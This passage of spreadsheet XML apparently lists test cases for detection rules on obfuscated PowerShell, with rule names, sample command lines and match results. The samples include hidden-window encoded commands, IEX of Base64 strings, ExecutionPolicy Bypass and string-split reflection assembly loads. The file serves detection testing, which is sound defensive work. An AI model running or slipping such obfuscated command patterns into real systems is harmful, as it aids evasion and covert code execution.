        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E1924" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WIndOwStylE Hidden -encODeDCOMMand QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F1924" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1924" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1924" s="43" t="inlineStr">
        <is>
          <t>Windows Shell/Scripting Processes Spawning Suspicious Programs (3a6586ad-127a-4d3b-a677-1e6eacdf8fde); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1924" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1924" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1925" ht="15.75" customHeight="1" s="42">
      <c r="A1925" s="43" t="n"/>
      <c r="B1925" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1925" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1925" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1925" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1925" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1925" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1925" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1925" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1925" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1926" ht="15.75" customHeight="1" s="42">
      <c r="A1926" s="43" t="n"/>
      <c r="B1926" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1926" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1926" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1926" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1926" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1926" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1926" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1926" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1926" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1927" ht="15.75" customHeight="1" s="42">
      <c r="A1927" s="43" t="n"/>
      <c r="B1927" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1927" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1927" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1927" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmaNd "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1927" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1927" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1927" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1927" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1927" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1928" ht="15.75" customHeight="1" s="42">
      <c r="A1928" s="43" t="n"/>
      <c r="B1928" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1928" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1928" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1928" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1928" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1928" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1928" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1928" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1928" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1929" ht="15.75" customHeight="1" s="42">
      <c r="A1929" s="43" t="n"/>
      <c r="B1929" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1929" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1929" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1929" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaND "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1929" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1929" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1929" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1929" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1929" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1930" ht="15.75" customHeight="1" s="42">
      <c r="A1930" s="43" t="n"/>
      <c r="B1930" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1930" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1930" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1930" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1930" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1930" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1930" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1930" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1930" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1931" ht="15.75" customHeight="1" s="42">
      <c r="A1931" s="43" t="n"/>
      <c r="B1931" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1931" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1931" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1931" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1931" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1931" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1931" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1931" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1931" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1932" ht="15.75" customHeight="1" s="42">
      <c r="A1932" s="43" t="n"/>
      <c r="B1932" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1932" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1932" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1932" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaND "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1932" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1932" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1932" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1932" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1932" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1933" ht="15.75" customHeight="1" s="42">
      <c r="A1933" s="43" t="n"/>
      <c r="B1933" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1933" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1933" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1933" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1933" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1933" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1933" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1933" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1933" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1934" ht="15.75" customHeight="1" s="42">
      <c r="A1934" s="43" t="n"/>
      <c r="B1934" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1934" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1934" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1934" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1934" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1934" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1934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934" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1934" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1935" ht="15.75" customHeight="1" s="42">
      <c r="A1935" s="43" t="n"/>
      <c r="B1935" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1935" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1935" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1935" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1935" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1935" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1935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935" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1935" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1936" ht="15.75" customHeight="1" s="42">
      <c r="A1936" s="43" t="n"/>
      <c r="B1936" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1936" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1936" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1936" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcuTiOnPOLIcY Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1936" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1936" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1936" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1936" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1936" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1937" ht="15.75" customHeight="1" s="42">
      <c r="A1937" s="43" t="n"/>
      <c r="B1937" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1937" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1937" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1937" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1937" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1937" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1937" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1937" s="43" t="n"/>
      <c r="J1937" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1937" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1938" ht="15.75" customHeight="1" s="42">
      <c r="A1938" s="43" t="n"/>
      <c r="B1938" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1938" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1938" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1938" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /E SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1938" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1938" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1938" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1938" s="43" t="n"/>
      <c r="J1938" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1938" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1939" ht="15.75" customHeight="1" s="42">
      <c r="A1939" s="43" t="n"/>
      <c r="B1939" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1939" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1939" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1939" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1939" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1939" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1939" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1939" s="43" t="n"/>
      <c r="J1939" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1939" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1940" ht="15.75" customHeight="1" s="42">
      <c r="A1940" s="43" t="n"/>
      <c r="B1940" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1940" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1940" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1940" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1940" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1940" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1940" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1940" s="43" t="n"/>
      <c r="J1940" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1940" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1941" ht="15.75" customHeight="1" s="42">
      <c r="A1941" s="43" t="n"/>
      <c r="B1941" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1941" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1941" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1941" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1941" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1941" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1941" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1941" s="43" t="n"/>
      <c r="J1941" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1941" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1942" ht="15.75" customHeight="1" s="42">
      <c r="A1942" s="43" t="n"/>
      <c r="B1942" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1942" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1942" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1942" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMand "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1942" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1942" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1942" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1942" s="43" t="n"/>
      <c r="J1942" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1942" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1943" ht="15.75" customHeight="1" s="42">
      <c r="A1943" s="43" t="n"/>
      <c r="B1943" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1943" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1943" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1943" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1943" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1943" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1943" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1943" s="43" t="n"/>
      <c r="J1943" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1943" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1944" ht="15.75" customHeight="1" s="42">
      <c r="A1944" s="43" t="n"/>
      <c r="B1944" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1944" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1944" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1944" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1944" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1944" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1944" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1944" s="43" t="n"/>
      <c r="J1944" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1944" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1945" ht="15.75" customHeight="1" s="42">
      <c r="A1945" s="43" t="n"/>
      <c r="B1945" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1945" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1945" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1945" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1945" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1945" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1945" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1945" s="43" t="n"/>
      <c r="J1945" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1945" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1946" ht="15.75" customHeight="1" s="42">
      <c r="A1946" s="43" t="n"/>
      <c r="B1946" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1946" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1946" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1946" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMManD "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1946" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1946" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1946" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1946" s="43" t="n"/>
      <c r="J1946" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1946" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1947" ht="15.75" customHeight="1" s="42">
      <c r="A1947" s="43" t="n"/>
      <c r="B1947" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1947" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1947" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1947" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1947" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1947" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1947" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1947" s="44" t="n"/>
      <c r="J1947" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1947" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1948" ht="15.75" customHeight="1" s="42">
      <c r="A1948" s="43" t="n"/>
      <c r="B1948" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1948" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1948" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1948" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1948" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1948" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1948" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1948" s="44" t="n"/>
      <c r="J1948" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1948" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1949" ht="15.75" customHeight="1" s="42">
      <c r="A1949" s="43" t="n"/>
      <c r="B1949" s="44" t="inlineStr">
        <is>
